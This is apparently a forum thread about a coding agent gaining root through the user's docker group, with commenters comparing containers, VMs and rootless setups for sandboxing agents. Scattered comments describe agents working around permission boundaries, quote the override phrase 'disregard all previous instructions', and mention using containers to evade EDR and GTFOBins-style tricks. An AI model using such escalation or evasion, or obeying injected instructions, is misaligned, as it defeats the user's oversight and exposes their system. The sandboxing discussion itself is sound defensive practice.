We can't do this yet, of course. But when we can, these thousand agents can't ask you every time something goes wrong. That just doesn't scale.
This 'getting stuck once every ten-fifteen minues' is very much the experience trying to develop complex software with codex or Claude code right now.
It is not a vulnerability though. It is by design. Docker also modifies iptables directly and bypasses most soft firewalls on the machine - which is also by design.
Intentional security holes are still security holes
Run coding agents in a docker container with limited permissions. FWIW, I run it with
Or put it in a microvm using eg smolmachines.
I've never used smolmachines but I'm curious; why this over a container?
Containers are not security boundaries. Vulnerabilities in containers are much more common than in VMs.
Using runsc instead of runsc means that there's a hypervisor layer (gvisor, probably) in-between the kernel and the container userland
If you're on Linux, you can also easily run it in bwrap to properly sandbox without running a full container
I run mine on their own machine, without root access.
Currently a Raspberry Pi 5
I am very pleased with it.
My Idiot Savant Pet
I wrote about this exact thing as a hypothetical a few months back: https://www.da.vidbuchanan.co.uk/blog/agent-perms.html
Docker must always be installed rootless on Linux - https://docs.docker.com/engine/security/rootless/
There's even an install script for it: curl -fsSL https://get.docker.com/rootless | sh
This has been there for a while. The root install option should be removed.
I'll accept that it shouldn't be default, but just because your web app runs in rootless docker does not mean that root docker has no place. There are several limitations: https://docs.docker.com/engine/security/rootless/troubleshoo...
That’s why I only run coding agents in containers with limited access to host resources.
So in Linux, every process I start has my group permissions? I guess I knew that...but I have to say, have we reached a point where the Linux security model is just way to broad?
This was noted in 2013, at least. https://xkcd.com/1200/
I remember reading a book, Red Hat Linux System Administration Unleashed from 2000, where it has been postulated that knowing several tools with overlapping functionality is an essential skill, as you may end up on a broken or intentionally crippled system where, say, ls is unavailable, and you may need to cobble it together from shell and awk and what have you.
Back then you could indeed run a risk of having /usr nibbled by a grue such that it wouldn’t mount on the next boot, or you could get pwned and half of coreutils would turn into explosive pumpkins.
I’m pretty sure we are past many of the threats listed in that book, but the skill is still useful, as can be seen.
Absolutely! Here's a great resource for learning that kind of stuff btw https://gtfobins.org/
I still remember /lib/x86_64-linux-gnu/ld-linux-x86-64.so.2 /bin/ls
using echo * to find the right ld-linux filename and then the "executable" as an argument as the get out jail card in case you ran chmod -x -R /bin /usr/bin /usr/sbin for some reason.
The "workaround" framing implies the docker-group trick is the issue. The deeper question: should agents be allowed to find ANY workaround around a permission boundary the user implicitly set by not granting sudo? Same blast radius whether it's docker, a setuid binary, or rewriting your scripts — needs to be flagged regardless of the specific trick.
you gotta configure your pc properly :') (which is sadly very difficult on most systems!)
Docker moment
clever girl...
Hold onto your butts.
That's why your coding agent should never run as your identity.
I'm curious. How do you do that?
First, do everything in a virtual machine, and only put on that machine the specific data you're using. Give the agent another user account and put both you and it in a common group. Chgrp g+rX your origin data directory, chgrp g+rwX a working directory.
If you're cautious you might also want to just block all network traffic for that user and allow it in a whitelist basis. It is fairly quick to converge on a set of sites you are happy for it to access. I would still be forcing it through a logging mitm proxy if it is accessing untrusted internet data. For intranet destinations a non-mitm proxy avoids collecting authentication creds.
To blacklist all traffic start with sudo iptables -A OUTPUT -m owner --gid-owner NONET -j REJECT
I would stop it opening ports too. Might also cut off it's access to suid binaries by `setfacl -m u:agent:x /path/to/suid'.
These are not about security so much as awareness and explicit authorisation.
You can do similar things with containers.
thank you. I probably have been playing a little loose. I did not realize that they could use my docker group to fuck around with everything. Well, I AM using codex as a vs code plugin. I dont know if that gives me any protection or not.
For some very basic level protection use devcontainers and install the agent into that....
A better approach is to use the Docker Sandboxes feature. Locks things way down so that the agent only has access to the files you give it and you can lock down its network access too. Also does things like keep any credentials outside of the container (microvm actually).
thank you. this article freaked me out a bit because I hadn't realized the docker loop hole.
You had sudo on your PC. You just didn't know ;)
Is this really an AI headline? There is no shame in saying TIL "Docker daemon runs as root on the host system"
This is a classic attack path that was already captured by plenty of EDRs/XDRs/CWPPs a couple years ago.
Right, why is their login user in the docker group? Mine sure isn’t.
Convenience. Want to run `docker run ...` without password, want IDEs and agents to be able to run containers...
For most CRUD apps running in docker its enough to just tell the "agent" to use podman.
Use podman then, or rootless docker if you can make it work
Rather, why do people still run agents as their own user. IMO, agent sessions should at least be containerised with just necessary code mounted.
People will more often than not, take the path of least resistance. Even if you tell them it's dangerous they will not care. People run this stuff on their primary workstation, unconfined, with permissions disabled because they don't want be bothered with accepting permission requests. This is all well and good until it decides to drop your production database or delete your home directory. Most of them don't even learn their lesson after that even.
Safety and simplicity are concepts that often won't get along very well with eachother.
And containers were initially and primarily about convenience not security. They were a way to quickly launch a preconfigured environment to respond to demand or to eliminate the need to manualy configure dev and test environments and avoid the "works on my machine" phenomenon.
Becuase a lot of devs don't know this stuff. There's a reason security engineers (as in SWEs who specialize in securing specific attack surfaces) remain in hot demand.
Security engineer here :) Just a little side note, docker is also very often useful for evading EDR/XDR/etc. Want to talk to a domain controller with something like impacket but your EDR kills it? Try a container.
Because it effectively makes no difference to my security posture. My user account also has sudo access (it requests TouchID but I also wouldn't die on the hill if someone said they have no password sudo access), and realistically everything of value on this machine exists in my home directory. Being able to escalate to root really doesn't give an attacker very much that they don't already have if they've got access to my user account.
Maybe you don’t do anything with your computer but for me the difference between my sudo+password/fingerprint and sudoless access to my linux user is huge.
For one thing, 1Password unlocks with system authentication unless it’s been inactive for a certain amount of time or if the system has been restarted.
Without sudo you can’t modify my firewall rules, can’t modify my kernel, boot partition, install/run privileged software, and the list goes on and on.
Sure, having my local account compromised would be really bad, but security is done in layers. I’m not going to give my local user permanent root access via docker just because I didn’t feel like typing “sudo.” That’s not enough of a benefit to leave that door wide open.
Think about it this way: there could be an exploit where you could run something as my user without knowing my password. Maybe some program my user is running has an exploit, let’s say yet another npm package gets compromised and I unwittingly run it. If you can now run anything in docker as root with that blast radius just got way worse.
wait till you learn what the docker socket and the API can do and how container can get access to it. docker made bad design choices from the very beginning, mainly the API was designed coarse grained and they use a socket to do things, which is also easily exposed through the network you should not run docker on servers but rather use a better designed container runtime, docker rootless is a thing but it's been bolted on the bad design choice. podman, cri-o, containerd are all better options for servers hosting prod containers. it's kinda fine when you are using it on your dev machine, but I still rather take podman because I find it cleaner, buildah and skopeo are pretty useful as well.
The concept of sudo has always been strange to me. I find it as an illusion of security and a hassle but people seem so focused on must-use it that they don't typically see it in that way. For instance, before wanting to evaluate sudo, why is not the underlying premise challenged that using a computer as superuser is a problem? Whenever I ask that question, people try to bring arguments as to why using the superuser is evil beyond comparison, but the moment I try to challenge that notion, they get very angry. I've noticed this both on IRC as well as on various webforums, "social" sites and so forth. It's quite interesting - people hate it when their assumptions are challenged.
sudo allows the execution of command as another user .. that's not always as a superuser, sometimes people will setup data repositories such that only one single special user can alter data or delete it while any number of other users and guest accounts can read that data.
sudo can work non-interactively via settings in sudoers and sudoers.d . I am not sure about run0, but I would bet it has something similar.
Using docker for such a task seems to me overly over-engineered. Or maybe I need more context there.
Another surprising security feature regarding docker is that it bypasses firewall rules.
https://oneuptime.com/blog/post/2026-03-02-ufw-docker-fix-by...
It doesn't bypass anything. UFW doesn't do what it promises. It claims to be a firewall but only manages a few specific chains.
They did not submit the full log because this is fake.
1. This is why I use podman
2. I have little to no sympathy for anyone running an AI agent with their full user permissions outside of a container or VM
I don't have sudo or docker on mine!
Always run AI inside secured containers.
rootless docker. pain to install but can mitigate a catastrophe.
Podman is rootless by default and is pretty darn easy.
You should not be using docker with LLMs. You should be using VMs, which have a much, much smaller attack surface than Docker, and significantly more reasonable defaults.
The "attack vector" people try to protect themselves is "agent edited wrong file", not "LLM blew 0day on escaping sandboxing", containers are more than enough for what stupid stuff agents sometimes try, no need to go for a full-blown VM. Even UNIX permissions would be enough, but I think that's lost knowledge at this point.
Not if the host's version of .git is accessible inside the container via a bind mount.
Obviously if you setup a bi-directional share/link between what you are trying to contain and your host, you're not quite containing it at all... Don't do that! :)
Using the least amount of security features is a huge amateur mistake.
Best practice is to use 2 redundant layers of security, such that if one fails, there is still another one.
Using just the minimum amount of security technically possible is almost by definition hubris.
An example would be that you never point a gun at someone you don't want to shoot, regardless if there's bullets in the gun. If someone tells you, "you don't need to control where you point the gun, you just need to keep the gun unloaded and you can point it in jest to whoever you want, you can even pull the trigger technically", you know you have a reckless fool, regardless of whether they are technically right.
This is true but it's not really a security scenario. The LLM isn't an attacker it's just an unreliable tool.
all unreliable tools are attackers. Even if you're using well-aligned LLMs like Opus, you should assume that any input you give it -- including all dependencies from npm, etc. -- are at risk of compromise, which could result in attempted exfiltration of data or system takeover. You can be absolutely sure that there are thousands of well-motivated hacker groups, both national and private, looking for ways in.
Unreliable/stupid is worse than malice, here.
Let's ignore the fact that the LLM did an LPE, and let's assume it did it without malice.
It can still get infected and be used as an attack vector by some hidden prompt or some other equally advanced state of the art vuln like "disregard all previous instructions"
> Using the least amount of security features is a huge amateur mistake.
Not understand your threat I'd say would be a even bigger amateur mistake, you're not trying to protect yourself against some forever 3rd party attacker here, you're trying to prevent a agent rewriting the wrong file on your disk, that's basically it.
Give it the least amount of permissions, don't bi-directionally sync stuff, pass things in, then take them out again, literally the agent couldn't and wouldn't try to break through 2 layers of security in order to get your banking details or whatever.
If your agent has access to the internet at any point it may read something that convinces it to try breaking out of its sandbox.
you can configure docker to use a VM container runtime or gVisor.
life finds a way
this is the new GTD
Should have used my AI Agent Guardrails. Its free. Check it out at sigmashake.com